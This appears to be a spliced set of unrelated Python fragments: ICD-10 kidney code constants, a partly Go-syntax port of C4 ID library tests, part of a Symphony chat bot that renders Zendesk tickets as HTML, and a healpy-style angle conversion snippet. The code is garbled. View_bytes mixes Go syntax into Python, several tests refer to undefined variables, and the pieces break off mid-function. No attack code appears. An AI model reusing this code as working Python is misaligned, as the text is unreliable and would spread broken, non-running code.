N00_0 = "N00.0"
N00_1 = "N00.1"
N00_2 = "N00.2"
N00_3 = "N00.3"
N00_4 = "N00.4"
N00_5 = "N00.5"
N00_6 = "N00.6"
N00_7 = "N00.7"
N00_8 = "N00.8"
N00_9 = "N00.9"
N01 = "N01"
N01_0 = "N01.0"
N01_1 = "N01.1"
N01_2 = "N01.2"
N01_3 = "N01.3"
N01_4 = "N01.4"
N01_5 = "N01.5"
N01_6 = "N01.6"
N01_7 = "N01.7"
N01_8 = "N01.8"
N01_9 = "N01.9"
N02 = "N02"
N02_0 = "N02.0"
N02_1 = "N02.1"
N02_2 = "N02.2"
N02_3 = "N02.3"
N02_4 = "N02.4"
N02_5 = "N02.5"
N02_6 = "N02.6"
N02_7 = "N02.7"
N02_8 = "N02.8"
N02_9 = "N02.9"
N03 = "N03"
N03_0 = "N03.0"
N03_1 = "N03.1"
N03_2 = "N03.2"
N03_3 = "N03.3"
N03_4 = "N03.4"
N03_5 = "N03.5"
N03_6 = "N03.6"
N03_7 = "N03.7"
N03_8 = "N03.8"
N03_9 = "N03.9"
N04 = "N04"
N04_0 = "N04.0"
N04_1 = "N04.1"
N04_2 = "N04.2"
N04_3 = "N04.3"
N04_4 = "N04.4"
N04_5 = "N04.5"
N04_6 = "N04.6"
N04_7 = "N04.7"
N04_8 = "N04.8"
N04_9 = "N04.9"
N05 = "N05"
N05_0 = "N05.0"
N05_1 = "N05.1"
N05_2 = "N05.2"
N05_3 = "N05.3"
N05_4 = "N05.4"
N05_5 = "N05.5"
N05_6 = "N05.6"
N05_7 = "N05.7"
N05_8 = "N05.8"
N05_9 = "N05.9"
N06 = "N06"
N06_0 = "N06.0"
N06_1 = "N06.1"
N06_2 = "N06.2"
N06_3 = "N06.3"
N06_4 = "N06.4"
N06_5 = "N06.5"
N06_6 = "N06.6"
N06_7 = "N06.7"
N06_8 = "N06.8"
N06_9 = "N06.9"
N07 = "N07"
N07_0 = "N07.0"
N07_1 = "N07.1"
N07_2 = "N07.2"
N07_3 = "N07.3"
N07_4 = "N07.4"
N07_5 = "N07.5"
N07_6 = "N07.6"
N07_7 = "N07.7"
N07_8 = "N07.8"
N07_9 = "N07.9"
N10_N15 = "N10-N15"
N10 = "N10"
N11 = "N11"
N11_0 = "N11.0"
N11_1 = "N11.1"
N11_8 = "N11.8"
N11_9 = "N11.9"
N12 = "N12"
N13 = "N13"
N13_0 = "N13.0"
N13_1 = "N13.1"
N13_2 = "N13.2"
N13_3 = "N13.3"
N13_4 = "N13.4"
N13_5 = "N13.5"
N13_6 = "N13.6"
N13_7 = "N13.7"
N13_8 = "N13.8"
N13_9 = "N13.9"
N14 = "N14"
N14_0 = "N14.0"
N14_1 = "N14.1"
N14_2 = "N14.2"
N14_3 = "N14.3"
N14_4 = "N14.4"
N15 = "N15"
N15_0 = "N15.0"
N15_1 = "N15.1"
N15_8 = "N15.8"
N15_9 = "N15.9"
N17_N19 = "N17-N19"
N17 = "N17"
N17_0 = "N17.0"
N17_1 = "N17.1"
N17_2 = "N17.2"
N17_8 = "N17.8"
N17_9 = "N17.9"
N18 = "N18"
N18_0 = "N18.0"
N18_1 = "N18.1"
N18_2 = "N18.2"
N18_3 = "N18.3"
N18_4 = "N18.4"
N18_5 = "N18.5"
N18_8 = "N18.8"
N18_9 = "N18.9"
N19 = "N19"
N20_N23 = "N20-N23"
N20 = "N20"
N20_0 = "N20.0"
N20_1 = "N20.1"
N20_2 = "N20.2"
N20_9 = "N20.9"
N21 = "N21"
N21_0 = "N21.0"
N21_1 = "N21.1"
N21_8 = "N21.8"
N21_9 = "N21.9"
N23 = "N23"
N25_N28 = "N25-N28"
N25 = "N25"
| |
from __future__ import print_function
import sys
from pyc4 import c4
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def test_sum():
assert sum([1, 2, 3]) == 6, "Should be 6"
def test_encoding():
tests = [ { 'in': "", 'exp': "<KEY>" } ]
for test in tests:
actual = c4.Identify(test['in'])
if actual.string() != test['exp']:
eprint("IDs don't match, got ", actual, " expected ", test["exp"])
return False
return True
def test_all_ffff():
b = []
for i in range(64):
b.append(chr(0xFF))
data = ''.join(b)
if c4.ID(data).string() != "<KEY>":
eprint("IDs don't match, got ", id.string(), " expcted ", "<KEY>")
return False
id2, err = c4.parse("<KEY>")
if err:
eprint("Unexpected error ", err)
return False
for bb in id2.value:
if bb != chr(0xFF):
eprint(bb, "incorrect Parse results")
return False
return True
def test_all_0000():
b = []
for i in range(64):
b.append(chr(0))
data = ''.join(b)
if c4.ID(data).string() != "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111":
eprint("IDs don't match, got ", id.string(), " expcted ",
"c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111")
return False
id2, err = c4.parse(
"c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111111")
if err:
eprint("Unexpected error ", err)
return False
for bb in id2.value:
if bb != chr(0):
eprint(bb, "incorrect Parse results")
return False
return True
def test_append_order():
byteData = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 58],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x0d, 0x24],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0xfa, 0x28],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xac, 0xad, 0x10]
]
expectedIDs = ["c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111211", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111112111", "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111121111"]
k = 0
for num in byteData:
b = []
for c in num:
b.append(chr(c))
id = c4.ID(''.join(b))
if id.string() != expectedIDs[k]:
eprint("IDs don't match, got ", id.string(), " , expcted ", expectedIDs[k])
return False
id2, err = c4.parse(expectedIDs[k])
if err:
eprint("Unexpected error ", err)
return False
i = 0
for bb in id2.value:
if bb != chr(byteData[k][i]):
eprint(bb, "incorrect Parse results")
return False
i = i + 1
k = k + 1
return True
def test_parse():
tests = [
{ "in": "<KEY>",
"err": None,
"exp": "This is a pretend asset file, for testing asset id generation.\n"
},
{
"in": "<KEY>",
"err": "invalid character at 3",
"exp": ""
},
{
"in": "c430cjRutKqZSCrW43QGU1uwRZTGoVD7A7kPHKQ1z4X<KEY>",
"err": "is not 90 characters long",
"exp": ""
}
]
i = 0
for test in tests:
id, err = c4.parse(test["in"])
if test["err"] is not None:
if not err:
eprint("Expected error but got none")
return False
elif err != test["err"]:
eprint("incorrect error got ", err, " expected ", test["err"])
return False
continue
elif err is not None:
eprint("Unexpected error ", err)
return False
expectedID = c4.Identify(test["exp"])
if expectedID != id:
eprint("IDs don't match, got ", _stringOf(id), ", expcted ", _stringOf(expectedID))
return False
return True
def _stringOf(id):
if not id:
return ""
return id.string()
def test_id_less():
id1 = c4.Identify("1") # <KEY>
id2 = c4.Identify("2") # c42i2hTBA9Ej4nqEo9iUy3pJRRE53KAH9RwwMSWjmfaQN7LxCymVz1zL9hEjqeFYzxtxXz2wRK7CBtt71AFkRfHodu
if id1.less(id2) != False:
eprint("expected %q to be less than %q", id2, id1)
return False
return True
def test_id_cmp():
id1 = c4.Identify("1") # c42yrSHMvUcscrQBssLhrRE28YpGUv9Gf95uH8KnwTiBv4odDbVqNnCYFs3xpsLrgVZfHebSaQQsvxgDGmw5CX1fVy
id2 = c4.Identify("2") # c42i2hTBA9Ej4nqEo9iUy3pJRRE53KAH9RwwMSWjmfaQN7LxCymVz1zL9hEjqeFYzxtxXz2wRK7CBtt71AFkRfHodu
# is.Equal(id1.Cmp(id2), 1)
if id1.Cmp(id2) != 1:
eprint("Incorrect comparison between %q, %q", id1, id2)
return False
if id2.Cmp(id1) != -1:
eprint("Incorrect comparison between %q, %q", id2, id1)
return False
if id1.Cmp(id1) != 0:
eprint("Incorrect comparison between %q, %q", id1, id1)
return False
return True
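# Illustrative sketch (not part of the original tests), assuming only what the
# tests above demonstrate: Cmp() returns -1/0/1, so a list of IDs can be sorted
# with functools.cmp_to_key. The helper name below is hypothetical.
def _sorted_ids_example(ids):
    import functools
    return sorted(ids, key=functools.cmp_to_key(lambda a, b: a.Cmp(b)))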
def TestCompareIDs():
tests = [
    {
        "id_a": c4.Identify("Test string"),
        "id_b": c4.Identify("Test string"),
        "exp": 0
    },
    {
        "id_a": c4.Identify("Test string A"),
        "id_b": c4.Identify("Test string B"),
        "exp": -1
    },
    {
        "id_a": c4.Identify("Test string B"),
        "id_b": c4.Identify("Test string A"),
        "exp": 1
    },
    {
        # NOTE: `id` is carried over from the original Go test, where it was a
        # package-level ID; it is not defined anywhere in this port.
        "id_a": c4.Identify("Test string"),
        "id_b": id,
        "exp": -1
    }
]
for test in tests:
if test["id_a"].Cmp(test["id_b"]) != test["exp"]:
eprint("Incorrect comparison between %q, %q", test["id_a"], test["id_b"])
return False
return True
def test_bytes_to_id():
byteData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 58]
b = []
for c in byteData:
    b.append(chr(c))
id = c4.ID(''.join(b))
if id.string() != "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121":
eprint("IDs don't match, got %q, expcted %q", id.string(), "c41111111111111111111111111111111111111111111111111111111111111111111111111111111111111121")
return False
return True
def test_nil_id():
# ID of nothing constant
nilid = c4.Identify("")
if nilid.string() != "c459dsjfscH38cYeXXYogktxf4Cd9ibshE3BHUo6a58hBXmRQdZrAkZzsWcbWtDg5oQstpDuni4Hirj75GEmTc1sFT":
eprint("IDs don't match, got %q, expcted %q", nilid.string(), "c459dsjfscH38cYeXXYogktxf4Cd9ibshE3BHUo6a58hBXmRQdZrAkZzsWcbWtDg5oQstpDuni4Hirj75GEmTc1sFT")
return False
return True
test_vectors = ["alfa", "bravo", "charlie", "delta", "echo", "foxtrot", "golf", "hotel", "india"]
test_vector_ids = [
# Initial list (unsorted).
[
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 1
[
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 2
[
"<KEY>",
"<KEY>",
"<KEY>"
],
# After round 3
[
"<KEY>",
"<KEY>"
],
# Final ID
[
"<KEY>"
]
]
def test_identification():
for i, test in enumerate(test_vectors):
c4id = c4.Identify(test)
if c4id.string() != test_vector_ids[0][i]:
eprint("IDs don't match, got %q expected %q", c4id.string(), test_vector_ids[0][i])
return False
return True
def view_bytes(b):
length = 4
out = fmt.Sprintf("(%d)[", len(b))
for j = 0; j < length; j++:
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
out += fmt.Sprintf(" ... ")
offset = 64 - length
if len(b) >= 128:
for j := 64 - length; j < 64+length; j++:
if j == 64:
out += " |"
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
offset = 128 - length
out += fmt.Sprintf(" ... ")
for j := offset; j < offset+length; j++:
num = strconv.Itoa(int(b[j]))
out += fmt.Sprintf(" %s%s", strings.Repeat(" ", 3-len(num)), num)
return out + " ]"
class testDataType:
def __init__(self, value, id, c4id):
self.value = value
self.id = id
self.c4id = c4id
def TestDigestSum():
test_data = []
for i, s in enumerate(test_vectors):
    dig = c4.Identify(s)
    id, err = c4.parse(test_vector_ids[0][i])
    if err is not None:
        eprint("unexpected error %q", err)
    if id.string() != dig.string():
        eprint("IDs don't match, got %q expected %q", id, dig)
    if id.string() != test_vector_ids[0][i]:
        eprint("IDs don't match, got %q expected %q", id.string(), test_vector_ids[0][i])
    test_data.append(testDataType(s, id, test_vector_ids[0][i]))
# pair := make([]byte, 0, 128)
# var l, r c4.ID
# var key string
# var id c4.ID
# lbytes, rbytes := make([]byte, 64), make([]byte, 64)
# for i, dta := range test_data {
# pair = append(pair, dta.Id[:]...)
# key = dta.Value
# id = dta.Id
# if i > 0 && i%2 == 1 {
# // right hand side
# t.Logf("%d: \"%s\"\n %s %s\n", i, key, id, viewBytes(dta.Id[:]))
# t.Logf("\tpair: %s\n", viewBytes(pair))
# r = dta.Id
# copy(rbytes, r[:])
# data := make([]byte, 64)
# switch r.Cmp(l) {
# case -1:
# copy(data, r[:])
# data = append(data, l[:]...)
# case 0:
# copy(data, l[:])
# case 1:
# copy(data, l[:])
# data = append(data, r[:]...)
# }
# t.Logf("\t l: %s\n\t r: %s\n", | |
# Get the name of the assignee given the assigneeID
conn.request("GET", "/api/v2/users/" + request_assignee, headers=headers)
res = conn.getresponse()
userAssigneeId = res.read()
tempUserAssignee = str(userAssigneeId.decode('utf-8'))
# data = json.dumps(tempUserAssignee, indent=2)
# data_dict = ast.literal_eval(data)
data_dict = json.loads(str(tempUserAssignee))
data = json.dumps(data_dict, indent=2)
d = json.loads(str(data))
assign_name = str(d["user"]["name"])
assigneeName = assign_name
except:
assigneeName = "N/A"
assignee_flag = True
requesterTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/requester/requested_tickets"
assigneeTicket = (_configDef['zdesk_config']['zdesk_url']) + "/agent/users/" + str(request_assignee) + "/assigned_tickets"
OrgTicket = (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "/organization/tickets"
try:
# Convert the Zendesk ID to company name
conn.request("GET", "/api/v2/users/" + str(requestrequester_id) + "/organizations.json", headers=headers)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"',""").replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
# print(orgName)
except:
try:
botlog.LogSymphonyInfo("Inside Second try for Org name value")
# Convert the Zendesk ID to company name
conn.request("GET", "/api/v2/users/" + str(requestrequester_id) + "/organizations.json",
headers=headers)
res = conn.getresponse()
companyID = res.read()
compNameRaw = str(companyID.decode("utf-8"))
data_dict = json.loads(str(compNameRaw))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d = json.loads(data)
org_Name = str(d["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("&", "&").replace("<", "<").replace('"',""").replace("'", "'").replace(">", ">")
orgName = str(org_name_temp)
# print(orgName)
except:
orgName = "N/A"
#messageDetail.ReplyToChat("Cannot get company info")
table_body = ""
if assignee_flag:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(assigneeName) + "</td>" \
"</tr></thead><tbody></tbody></table>"
else:
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:15%;border:1px solid blue;border-bottom: double blue;text-align:center'>SUBJECT</td>" \
"<td style='border:1px solid black;text-align:left'>" + str(request_subject) + "</td></tr><tr>" \
"<td style='border:1px solid black;text-align:left' colspan=\"2\">" + str(request_desc) + "</td></tr><tr>" \
"<td style='width:3%;border:1px solid blue;border-bottom: double blue;text-align:center'>ID</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a></td></tr><tr>" \
"<td style='width:4%;border:1px solid blue;border-bottom: double blue;text-align:center'>STATUS</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(requeststatus) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>PRIORITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_priority) + "</td></tr><tr>" \
"<td style='width:4.5%;border:1px solid blue;border-bottom: double blue;text-align:center'>SEVERITY</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_severity) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a></td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>REQUESTER</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(requesterTicket) + "\">" + str(requesterName) + "</a></td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>CREATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_created) + "</td></tr><tr>" \
"<td style='width:5%;border:1px solid blue;border-bottom: double blue;text-align:center'>UPDATED</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(request_updated) + "</td></tr><tr>" \
"<td style='width:7%;border:1px solid blue;border-bottom: double blue;text-align:center'>ASSIGNEE</td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a></td>" \
"</tr></thead><tbody></tbody></table>"
# # Enable this to troubleshoot if there is any issue of character limitation
# UniqueToken = len(set(table_header.split()))
# print("Unique: " + str(UniqueToken))# + " Unique1: " + str(UniqueToken1))
# print("Ticket ID: " + str(ticketid))
#
# myTicketLenght = len(str(table_header))
# print(str(myTicketLenght))
# table_bodyFull += ("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a> (<a href=\"" + str(OrgTicket) + "\">" + str(orgName) + ")</a> " + str(request_subject) + " (assigned: " + "<a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a> Updated: " + str(request_updated) + " Status: " + str(requeststatus) + ")</header><body>" + table_header + "</body></card>")
table_bodyFull += ("<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header><a href=\"" + (_configDef['zdesk_config']['zdesk_link']) + str(request_id) + "\">" + str(request_id) + "</a> (<a href=\"" + str(OrgTicket) + "\">" + str(orgName) + "</a>) " + str(request_subject) + " (assigned: " + "<a href=\"" + str(assigneeTicket) + "\">" + str(assigneeName) + "</a> Updated: " + str(request_updated) + " Status: " + str(requeststatus) + ")</header><body>" + table_header + "</body></card>")
reply = table_bodyFull
characterLimit = len(str(table_bodyFull))
#if characterLimit >= 70000:
if characterLimit >= int(_configDef['limit']['character']):
messageDetail.ReplyToChatV2("You have reached a character limitation. Ticket(s) from ID " + str(request_id) + " is/are not showing, please check against your given ticket list")
return messageDetail.ReplyToChatV2_noBotLog(str(reply))
break
try:
if wrongID:
if index == len(message_split) - 1:
return messageDetail.ReplyToChatV2(reply + "<p></p><b>There is no such Zendesk ticket number: " + str(wrongZDID) + "</b>")
except:
if index == len(message_split) - 1:
#messageDetail.ReplyToChatV2(reply)
#messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
messageDetail.ReplyToChatV2_noBotLog(str(reply))
# else:
# return messageDetail.ReplyToChat("You aren't authorised to use this command. Please consult Symphony Support team")
except:
try:
botlog.LogSystemInfo("Inside Second try showZD")
streamType = (messageDetail.ChatRoom.Type)
#print(streamType)
showRequest = (messageDetail.Command.MessageText)
message_split = str(showRequest).split()
wrongZDID = ""
table_bodyFull = ""
reply = ""
isnext = False
for index in range(len(message_split)):
zdid = str(message_split[index]).strip()
assignee_flag = False
if len(message_split) == 1:
try:
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
'zdesk_token': True
}
# base64Encoded = base64.b64encode(bytes((emailZendesk + "/token:" + _configDef['zdesk_config']['zdesk_password']), 'utf-8'))
# base64Enc = (base64Encoded.decode("utf-8"))
# print(str(base64Enc))
# base = ("Basic " + base64Enc)
# print(str(base))
#
# headers = {
# 'email_address': emailZendesk + "/token",
# 'password': (_configDef['zdesk_config']['zdesk_password']),
# 'authorization': base,
# 'cache-control': "no-cache",
# 'content-type': "application/json"
# }
conn.request("GET", "/api/v2/tickets/" + zdid + ".json", headers=headers)
res = conn.getresponse()
data_raw = res.read()
data = remove_emoji(data_raw)
#request_raw = data.decode("utf-8")
request_raw = str(data)
ticketDoesNotExist = "{\"error\":\"RecordNotFound","description\":\"Not found\"}"
if request_raw.startswith(ticketDoesNotExist):
return messageDetail.ReplyToChatV2("<b>There is no such Zendesk ticket number: " + str(zdid) + "</b>")
else:
isnext = True
messageDetail.ReplyToChat("Rendering the data from Zendesk for the requested ticket")
except:
return messageDetail.ReplyToChatV2("<b>There is no such Zendesk ticket number: " + str(zdid) + "</b>")
else:
try:
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
'zdesk_token': True
}
conn.request("GET", "/api/v2/tickets/" + zdid + ".json", headers=headers)
res = conn.getresponse()
data = res.read()
request_raw = data.decode("utf-8")
ticketDoesNotExist = "{\"error\":\"RecordNotFound","description\":\"Not found\"}"
if request_raw.startswith(ticketDoesNotExist):
isnext = False
wrongID = True
wrongZDID += zdid + " "
else:
isnext = True
if index == 1:
messageDetail.ReplyToChat("Rendering the data from Zendesk for the requested tickets")
except:
isnext = False
wrongID = True
wrongZDID += zdid + " "
if isnext:
# try:
# data = json.dumps(request_raw, indent=2)
# data_dict = ast.literal_eval(data)
# d = json.loads(data_dict)
data_dict = json.loads(str(request_raw))
data = json.dumps(data_dict, indent=2)
d = json.loads(data)
#for index in range(len(request_raw["request"])):
# requestid = str(d["request"]["id"])
# requeststatus = d["request"]["status"]
# requestpriority = d["request"]["priority"]
# requestsubject = d["request"]["subject"]
# requestdescription_temps = d["request"]["description"]
# requestdescription = requestdescription_temps.replace("<", "<")
# requestorganization_id = str(d["request"]["organization_id"])
# requestrequester_id = str(d["request"]["requester_id"])
# #print(requestrequester_id)
# requestcreated_at = str(d["request"]["created_at"])
# requestupdated_at = str(d["request"]["updated_at"])
# requestassignee_id = str(d["request"]["assignee_id"])
requestid = str(d["ticket"]["id"])
requeststatus = str(d["ticket"]["status"])
requestpriority = str(d["ticket"]["priority"])
requestsubject_temp = str(d["ticket"]["subject"])
requestsubject = str(requestsubject_temp).replace("&", "&amp;").replace("<", "&lt;").replace('"', "&quot;").replace("'", "&apos;").replace(">", "&gt;")
requestdescription_temps = str(d["ticket"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&amp;").replace("<", "&lt;").replace('"', "&quot;").replace("'", "&apos;").replace(">", "&gt;").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
requestorganization_id = str(d["ticket"]["organization_id"])
requestrequester_id = str(d["ticket"]["requester_id"])
requestcreated_at = str(d["ticket"]["created_at"]).replace("T", " ").replace("Z", "")
The angle theta (scalar or shape (N,))
or both angles (scalar or shape (2, N)) if phi is not given.
phi : float, scalar or array-like, optional
The angle phi (scalar or shape (N,)).
lonlat : bool
If True, input angles are assumed to be longitude and latitude in degree,
otherwise, they are co-latitude and longitude in radians.
Returns
-------
vec : array
The vector(s) corresponding to given angles, shape is (3,) or (3, N).
See Also
--------
:func:`vec2dir`, :func:`pixelfunc.ang2vec`, :func:`pixelfunc.vec2ang`
"""
if phi is None:
theta, phi = theta
if lonlat:
lon, lat = theta, phi
theta, phi = np.pi / 2.0 - np.radians(lat), np.radians(lon)
ct, st, cp, sp = np.cos(theta), np.sin(theta), np.cos(phi), np.sin(phi)
vec = np.empty((3, ct.size), np.float64)
vec[0, :] = st * cp
vec[1, :] = st * sp
vec[2, :] = ct
return vec.squeeze()
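# Illustrative usage sketch (not part of the original module): dir2vec should
# always return a unit vector; the helper name below is hypothetical.
def _dir2vec_example():
    # longitude 45 deg, latitude 30 deg -> unit 3-vector on the sphere
    v = dir2vec(45.0, 30.0, lonlat=True)
    assert np.allclose(np.sum(v ** 2), 1.0)
    return v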
def angdist(dir1, dir2, lonlat=False):
"""Returns the angular distance between dir1 and dir2.
Parameters
----------
dir1, dir2 : float, array-like
The directions between which computing the angular distance.
Angular if len(dir) == 2 or vector if len(dir) == 3.
See *lonlat* for unit
lonlat : bool, scalar or sequence
If True, angles are assumed to be longitude and latitude in degree,
otherwise they are interpreted as colatitude and longitude in radian.
If a sequence, lonlat[0] applies to dir1 and lonlat[1] applies to dir2.
Returns
-------
angles : float, scalar or array-like
The angle(s) between dir1 and dir2 in radian.
Examples
--------
>>> import healpy as hp
>>> hp.rotator.angdist([.2,0], [.2, 1e-6])
array([ 1.98669331e-07])
"""
if hasattr(lonlat, "__len__") and len(lonlat) == 2:
lonlat1, lonlat2 = lonlat
else:
lonlat1 = lonlat2 = lonlat
dir1 = np.asarray(dir1)
dir2 = np.asarray(dir2)
if dir1.ndim == 2:
if dir1.shape[0] == 2: # theta, phi -> vec
vec1 = dir2vec(dir1, lonlat=lonlat1)
else:
vec1 = np.reshape(dir1, (3, -1))
vec1 = normalize_vec(vec1)
elif dir1.ndim == 1:
if dir1.shape[0] == 2: # theta, phi -> vec
vec1 = np.reshape(dir2vec(dir1, lonlat=lonlat1), (3, 1))
else:
vec1 = np.reshape(dir1, (3, 1))
vec1 = normalize_vec(vec1)
if dir2.ndim == 2:
if dir2.shape[0] == 2: # theta, phi -> vec
